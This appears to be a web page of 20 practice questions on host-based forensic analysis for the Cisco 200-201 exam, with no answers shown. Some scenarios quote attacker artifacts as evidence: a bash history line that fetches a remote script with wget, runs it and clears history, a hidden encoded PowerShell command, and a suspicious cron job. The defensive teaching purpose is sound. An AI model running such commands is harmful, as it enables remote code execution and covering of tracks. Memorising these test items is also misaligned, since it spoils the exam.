Host-Based Analysis
Drill 20 practice questions focused entirely on Host-Based Analysis for the Cisco 200-201 exam. Tap an answer for instant feedback and a full explanation — no sign-up, always free.
During a breach investigation, an analyst has confirmed the malware family, the exploited vulnerability, and the affected systems. Management now asks the analyst to determine WHO conducted the attack by correlating TTPs, infrastructure reuse, and language artifacts in the code with a known threat group. Which investigative concept does this task represent?
During a forensic investigation, an analyst acquires a bit-for-bit copy of a suspect's hard drive. Before analysis, the analyst calculated a SHA-256 hash of the original evidence drive as 'a1b2c3...'. After the imaging process completes, the analyst calculates the hash of the acquired image file and gets '9f8e7d...'. What conclusion should the analyst draw about the disk image?
During an investigation of a Linux web server, an analyst reviews the following excerpt from a user's ~/.bash_history file: wget http://198.51.100.7/x.sh chmod +x x.sh ./x.sh history -c Which conclusion is BEST supported by interpreting this command-line log?
While investigating a compromised Ubuntu web server, an analyst reviews /var/log/syslog and finds the following recurring entry every 10 minutes: 'CRON[4821]: (www-data) CMD (/tmp/.update.sh)'. The www-data account normally only serves web content and has no legitimate scheduled tasks. What does this log evidence most likely indicate?
During an investigation of a compromised Ubuntu web server, an analyst runs 'stat /var/www/html/config.php' and reviews the output, which shows fields labeled 'Inode', 'Links', 'Access', 'Modify', and 'Change'. Which operating system component stores the metadata (such as permissions, ownership, and the Modify/Change timestamps) for this file on the Linux ext4 filesystem?
During an investigation on a Linux workstation, an analyst reviews /var/log/messages and finds the following entries around 14:07: 'kernel: usb 2-1: new high-speed USB device number 4', 'kernel: sd 6:0:0:0: [sdb] Attached SCSI removable disk', and 'systemd: Mounted /media/user/BACKUP'. Which conclusion is best supported by these log entries?
While reviewing a compromised Linux web server, an analyst opens /var/log/auth.log and finds the following entry: 'Aug 14 02:17:44 web01 sudo: www-data : TTY=pts/1 ; PWD=/var/www/html ; USER=root ; COMMAND=/bin/bash' Which event does this log entry BEST indicate?
A SOC is evaluating endpoint protection platforms. During testing, a brand-new malware variant with no prior hash record and no matching vendor signature is executed on a monitored host. The EPP flags the process as malicious because its runtime behavior—rapid file enumeration followed by mass encryption calls—statistically matches patterns learned from thousands of previous ransomware samples. Which detection capability of the endpoint technology is responsible for this catch?
During analysis of a suspicious executable, an analyst uploads the file to a detonation chamber. The sandbox report's static analysis section shows a benign import table and no known signature match, but the dynamic analysis section records the process spawning cmd.exe, writing to the Startup folder, and initiating an outbound TCP connection to a rare foreign IP. Which conclusion is best supported by this sandbox output?
During a malware investigation, an analyst submits a suspicious executable to an automated sandbox. The generated report shows the sample dropped a DLL into C:\Users\Public, spawned cmd.exe to disable Windows Defender, and modified file timestamps to match legitimate system files. Which behavior in this report specifically indicates the malware attempted anti-forensic activity?
An analyst submits a suspicious executable to a malware detonation chamber. Reviewing the report, they want to determine whether this exact sample has been seen before by threat intelligence feeds without executing it again. Which section of the sandbox output report should the analyst reference?
An analyst detonates a suspicious executable in a sandbox. The output report shows the following observed behaviors: a child process spawned, a file written to %APPDATA%, and an outbound DNS query to 'update-svc.badhost[.]net' followed by an HTTPS connection to 175.120.44.9 on port 443. Based on this section of the report, which type of indicator is MOST directly identified by the DNS query and HTTPS connection?
An analyst detonates a suspicious executable in a sandbox. The output report shows the following activity: the file wrote a copy of itself to %APPDATA%, created a value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run pointing to that copy, spawned a child process, and made an outbound DNS query to a newly registered domain. Which behavior in the report indicates the malware is attempting to establish persistence on the host?
A security analyst is evaluating the endpoint protection deployed across the organization. The current solution relies exclusively on a database of known malicious file hashes and byte patterns that must be updated daily. During a recent incident, a newly compiled variant of a known malware family bypassed the endpoint tool entirely, even though the family had been documented for months. Which characteristic of this detection technology best explains why the variant went undetected?
During a forensic investigation, an analyst receives a suspect's disk image along with the acquisition documentation. The original acquisition log records a SHA-256 hash of the image taken at collection time. When the analyst recomputes the SHA-256 hash of the received image, the value differs from the one in the acquisition log. Additionally, the analyst notices several files whose modified timestamps postdate the recorded acquisition time. What conclusion best describes the state of this disk image?
During an investigation, an analyst reviews a Windows host and finds the following entry in the Application event log: 'Event ID 1000, Application Error, Faulting application name: outlook.exe, Faulting module name: unknown.dll, Exception code: 0xc0000005'. The analyst also notes that unknown.dll is not signed and was created in a temp directory hours before the crash. What does this log entry most directly indicate?
During a forensic investigation on a Windows workstation, an analyst suspects a malicious file was deleted before the machine was seized. The analyst needs to recover metadata about the deleted file, including its original name, size, and timestamps, even though the file's data clusters may have been reused. Which NTFS operating system component should the analyst examine to find this residual metadata?
During an investigation, an analyst reviews a Windows PowerShell operational transcript log and finds the following entry: 'powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0AC4A...'. Based on interpreting this command-line log, what event does this entry most likely indicate?
During a host investigation on a Windows workstation, an analyst needs to examine the hierarchical database that stores configuration settings for the operating system, installed applications, user profiles, and hardware. Which operating system component should the analyst inspect?
During an investigation, an analyst reviews the Windows Security event log on a workstation and finds an Event ID 4624 with 'Logon Type: 10' occurring shortly before suspicious activity. What does this log entry most likely indicate?
More 200-201 practice
Keep going with the other Cisco CCNA Cybersecurity (200-201 CCNACBR) domains, or take a full timed mock exam.
← Back to 200-201 overview